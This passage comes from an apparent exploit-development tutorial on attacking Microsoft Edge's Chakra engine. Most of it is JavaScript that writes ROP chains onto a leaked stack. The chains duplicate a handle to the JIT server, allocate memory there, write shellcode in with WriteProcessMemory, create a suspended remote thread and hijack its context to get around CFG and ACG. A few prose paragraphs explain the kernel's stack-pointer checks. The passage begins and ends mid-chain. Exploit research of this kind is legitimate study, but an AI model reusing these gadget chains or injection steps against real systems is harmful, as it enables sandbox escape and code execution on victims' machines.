write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
next();

After preserving CONTEXT.Rsp, we can manipulate CONTEXT.Rip to directly point to our ret gadget. We don’t really need to save this address, because once we are done writing to it, we simply don’t need to worry about it anymore.

Now that we have RSP preserved, it is finally time to use one last call to WriteProcessMemory to write our final VirtualProtect ROP chain into the JIT process.

WriteProcessMemory ROP Chain (Round 4)

Our last step is to write our ROP chain into the remote process. You may be thinking - “Connor, we just hijacked RIP. Why can’t we just hijack RSP instead of writing our payload to the existing stack?” Great question! We know that if we call SetThreadContext, CFG doesn’t perform any validation on the instruction pointer to ensure we aren’t calling into the middle or end of a function. There is now way for CFG to know this! However, CFG does perform some slight validation of the stack pointer on SetThreadContext calls - via a function called RtlGuardIsValidStackPointer.

When the SetThreadContext function is called, this performs a syscall to the kernel (via NtSetContextThread). In the kernel, this eventually leads to the kernel version of NtSetContextThread, which calls PspSetContextThreadInternal.

PspSetContextInternal eventually calls KeVerifyContextRecord. KeVerifyContext record eventually calls a function called RtlGuardIsValidStackPointer.

This feature of CFG checks the TEB to ensure that any call to SetThreadContext has a stack base and limit within the known bounds of the stack managed by the TEB. This is why we cannot change RSP to something like our VirtualAllocEx allocation - as it isn’t within the known stack bounds. Because of this, we have to directly write our ROP payload to the existing stack (which we leaked via GetThreadContext).

With that said, let’s see our last WriteProcessMemory call. Here is how the call will be setup:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	NULL 						// Optional
);
// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
